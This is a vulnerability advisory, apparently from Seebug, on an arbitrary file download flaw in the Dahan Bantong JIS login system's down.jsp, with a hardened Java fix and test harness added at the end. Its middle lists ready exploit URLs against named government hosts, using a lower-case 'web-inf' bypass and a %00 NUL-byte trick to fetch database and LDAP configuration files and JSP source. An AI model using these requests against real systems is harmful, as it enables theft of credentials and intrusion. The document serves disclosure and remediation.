Dahan Bantong (大汉版通) JIS identity authentication system arbitrary file download vulnerability

2014-01-26T00:00:00
ID SSV:93881
Type seebug
Reporter Root
Modified 2014-01-26T00:00:00

Description

Brief description:

Arbitrary file download vulnerability in the Dahan Bantong (大汉版通) unified login JIS system

Detailed description:

Interface:

![image001.png](https://images.seebug.org/upload/201401/26105926dbb7ae7dbef246c271df993903d50aa8.png)

JIS arbitrary file download. At least on Windows it generally works against every version; a few versions added a permission check and require login, but I think that as long as the logged-in identity is suitable, it works on all of them under Windows.

Proof of vulnerability:

```java
// Path check in down.jsp as quoted by the reporter (vulnerable as shown).
if (strFilePath.indexOf("WEB-INF") != -1) {          // case-sensitive substring match only
    LogWriter.debug("下载文件不存在!");                // "file to download does not exist!"
    out.println("<script>alert('file not exist!');history.back();</script>");
    return;
}

// check whether the file exists
File file = new File(strFilePath);
if (!file.exists() || file.getName().endsWith(".jsp")) {   // extension check on the raw name
    LogWriter.debug("下载文件不存在!");
    out.println("<script>alert('file not exist!');history.back();</script>");
    return;
}
```

A case-sensitive check is completely useless on Windows, where the filesystem is case-insensitive and `web-inf` opens the same directory as `WEB-INF`:

http://management.ysx.gov.cn/jis/down.jsp?pathfile=web-inf/config/dbconfig.xml

![image003.png](https://images.seebug.org/upload/201401/261059478a10d39a643737c7072b9ee581c0ae38.png)

http://ln-n-tax.gov.cn/jis/down.jsp?pathfile=WEB-INF/config/dbconfig.xml

![image005.png](https://images.seebug.org/upload/201401/26110016c12a97a28ebd14929a822b34f82d03c7.png)

A trailing NUL byte retrieves the JSP source itself: `%00` defeats `endsWith(".jsp")` because the Java-level name ends in the NUL, while older JDKs hand the name to the OS, which truncates it at the NUL and opens `down.jsp`:

http://jis.sdds.gov.cn/jis/down.jsp?pathfile=down.jsp%00

![image006.png](https://images.seebug.org/upload/201401/261100426d0546ce66fac4732523c6cab76c77a6.png)

http://210.75.196.69/jis/down.jsp?pathfile=portlet/gmail/ldapconf.xml

![image007.png](https://images.seebug.org/upload/201401/261101025ee0ae51aa5b46dc2d28510b2466b056.png)

http://leader.beijing.gov.cn/jis/down.jsp?pathfile=portlet/gmail/ldapconf.xml
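The check below is an added example written for this page, not the vendor's own `down.jsp` code. It shows how the quoted check should have been written so that the two bypasses above (lower-case `web-inf` on Windows and the trailing NUL byte) no longer work: the `pathfile` parameter is resolved against the canonical web root, normalised, confined to that root, and its path elements are compared case-insensitively. The class and method names (`SafeDownload`, `resolveDownload`) and the assumption that the servlet has the web root as a `Path` and the raw parameter as a `String` are mine; the files created in `main` are a constructed throw-away web root that mirrors the paths in the advisory.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.util.Locale;

// Added example for this page, not the vendor's down.jsp. Names are my own.
public class SafeDownload {

    /** Returns the canonical file to serve, or null when the request must be refused. */
    public static Path resolveDownload(Path webRoot, String pathfile) throws IOException {
        if (pathfile == null || pathfile.isEmpty()) return null;

        // "down.jsp%00": older JDKs hand the name to the OS, which truncates it at the
        // NUL, so endsWith(".jsp") never sees the real name. Refuse NUL up front.
        if (pathfile.indexOf('\0') >= 0) return null;

        Path root = webRoot.toRealPath();          // canonical web root
        Path candidate;
        try {
            // normalize() collapses "." and "..", so the decision is made on the result
            candidate = root.resolve(pathfile).normalize();
        } catch (InvalidPathException e) {
            return null;                           // illegal characters for this filesystem
        }

        // An absolute pathfile replaces root in resolve(); ".." climbs out of it.
        // Either way the result no longer starts with root, so reject it.
        if (!candidate.startsWith(root) || candidate.equals(root)) return null;

        // indexOf("WEB-INF") is case-sensitive but Windows is not, so compare every
        // path element case-insensitively instead of substring-matching the raw string.
        for (Path element : root.relativize(candidate)) {
            String name = element.toString();
            if (name.equalsIgnoreCase("WEB-INF") || name.equalsIgnoreCase("META-INF")) {
                return null;
            }
        }

        // Same treatment for the source-file check: "DOWN.JSP" is down.jsp on Windows.
        Path fileName = candidate.getFileName();
        if (fileName == null
                || fileName.toString().toLowerCase(Locale.ROOT).endsWith(".jsp")) {
            return null;
        }

        // Only serve regular files, and re-check containment after following symlinks.
        if (!Files.isRegularFile(candidate)) return null;
        Path real = candidate.toRealPath();
        return real.startsWith(root) ? real : null;
    }

    // Exercise the payloads from the advisory against a constructed throw-away web root.
    public static void main(String[] args) throws IOException {
        Path root = Files.createTempDirectory("jis-webroot");
        Files.createDirectories(root.resolve("WEB-INF/config"));
        Files.createDirectories(root.resolve("portlet/gmail"));
        Files.write(root.resolve("WEB-INF/config/dbconfig.xml"), "<db/>".getBytes(StandardCharsets.UTF_8));
        Files.write(root.resolve("down.jsp"), "<%-- jsp --%>".getBytes(StandardCharsets.UTF_8));
        Files.write(root.resolve("portlet/gmail/ldapconf.xml"), "<ldap/>".getBytes(StandardCharsets.UTF_8));
        Files.write(root.resolve("public.txt"), "hello".getBytes(StandardCharsets.UTF_8));

        String[] payloads = {
            "web-inf/config/dbconfig.xml",   // case bypass from the advisory
            "WEB-INF/config/dbconfig.xml",
            "down.jsp\0",                    // NUL-byte bypass from the advisory
            "../../etc/passwd",              // classic traversal
            "portlet/gmail/ldapconf.xml",    // sits in the public tree: still served
            "public.txt",
        };
        for (String p : payloads) {
            Path served = resolveDownload(root, p);
            System.out.printf("%-30s -> %s%n", p.replace("\0", "%00"),
                    served == null ? "REFUSED" : "served " + root.relativize(served));
        }
    }
}
```

Two caveats follow from the last payload. `portlet/gmail/ldapconf.xml` is still served, because it lives in the public web tree and no path check can tell it apart from a legitimate download; files like that belong under `WEB-INF` or outside the web root entirely. And the explicit NUL check is belt-and-braces: newer JDKs already reject NUL in file paths, but the deployments in the advisory were evidently running a JDK that did not.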